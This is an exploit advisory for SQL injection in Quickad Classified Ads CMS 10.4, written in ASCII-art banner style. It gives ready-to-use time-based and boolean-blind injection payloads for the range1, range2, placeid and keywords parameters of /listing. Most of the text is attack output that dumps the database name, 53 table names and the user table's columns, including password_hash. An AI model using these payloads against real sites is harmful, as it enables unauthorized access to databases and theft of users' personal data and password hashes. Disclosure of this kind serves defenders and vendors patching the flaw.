Quickad Classified Ads CMS version 10.4 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://bylancer.com/ │
│ Vendor : Bylancer │
│ Software : Quickad Classified Ads CMS 10.4 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company's reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /listing
https://website/listing?location=Beirut&latitude=&longitude=&placetype=city&placeid=[SQLI]&keywords=[SQLI]&cat=&subcat=
https://website/listing?keywords=[SQLI]&location=Beirut&placetype=city&placeid=[SQLI]&cat=1&subcat=&filter=&sort=Newest&order=DESC&custom%5B15%5D=&range1=[SQLI]&range2=[SQLI]
GET parameter 'range1' is vulnerable to SQL Injection
---
Parameter: range1 (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1 AND (SELECT 3133 FROM (SELECT(SLEEP(5)))crfu)&range2=1
---
GET parameter 'range2' is vulnerable to SQL Injection
---
Parameter: range2 (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1&range2=1) AND (SELECT 7411 FROM (SELECT(SLEEP(5)))iiGu)-- jHQy
---
GET parameter 'placeid' is vulnerable to SQL Injection
---
Parameter: placeid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND 3510=3510 AND ('DiTr'='DiTr&keywords=&cat=&subcat=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND (SELECT 2494 FROM (SELECT(SLEEP(5)))FKvp) AND ('WPrM'='WPrM&keywords=&cat=&subcat=
---
GET parameter 'keywords' is vulnerable to SQL Injection
---
Parameter: keywords (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: location=Beirut&latitude=1&longitude=1&placetype=city&placeid=276781&keywords=1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&cat=1&subcat=1
---
[+] Starting the Attack
fetching current database
current database: 'classified_******'
fetching tables
[53 tables]
+---------------------------+
| ad_custom_fields |
| ad_product |
| pro_admins |
| pro_adsense |
| pro_balance |
| pro_blog |
| pro_blog_cat_relation |
| pro_blog_categories |
| pro_blog_comment |
| pro_catagory_main |
| pro_catagory_sub |
| pro_category_translation |
| pro_cities |
| pro_countries |
| pro_currencies |
| pro_custom_data |
| pro_custom_fields |
| pro_custom_options |
| pro_emailq |
| pro_faq_entries |
| pro_favads |
| pro_firebase_device_token |
| pro_languages |
| pro_login_attempts |
| pro_logs |
| pro_messages |
| pro_mobile_numbers |
| pro_notification |
| pro_options |
| pro_pages |
| pro_payments |
| pro_plan_options |
| pro_plans |
| pro_product |
| pro_product_resubmit |
| pro_push_notification |
| pro_qbm_banners |
| pro_qbm_log |
| pro_qbm_options |
| pro_qbm_transactions |
| pro_qbm_types |
| pro_reviews |
| pro_subadmin1 |
| pro_subadmin2 |
| pro_subscriptions |
| pro_taxes |
| pro_testimonials |
| pro_time_zones |
| pro_transaction |
| pro_upgrades |
| pro_user |
| pro_user_options |
| pro_usergroups |
+---------------------------+
fetching columns from Table 'pro_user'
[36 columns]
+----------------+----------------------------------------+
| Column | Type |
+----------------+----------------------------------------+
| description | text |
| name | varchar(225) |
| status | enum('0','1','2') |
| view | int(11) |
| address | varchar(255) |
| city | varchar(225) |
| confirm | varchar(255) |
| country | varchar(50) |
| created_at | datetime |
| email | varchar(255) |
| facebook | varchar(255) |
| forgot | varchar(255) |
| googleplus | varchar(255) |
| group_id | int(11) |
| id | int(11) |
| image | varchar(225) |
| instagram | varchar(255) |
| lastactive | datetime |
| linkedin | varchar(255) |
| notify | enum('0','1') |
| notify_cat | varchar(255) |
| oauth_link | varchar(255) |
| oauth_provider | enum('','facebook','google','twitter') |
| oauth_uid | varchar(100) |
| online | enum('0','1') |
| password_hash | varchar(255) |
| phone | varchar(255) |
| postcode | varchar(255) |
| sex | enum('Male','Female','Other') |
| tagline | varchar(255) |
| twitter | varchar(255) |
| updated_at | datetime |
| user_type | enum('user','seller') |
| username | varchar(255) |
| website | varchar(255) |
| youtube | varchar(255) |
+----------------+----------------------------------------+
[-] Done
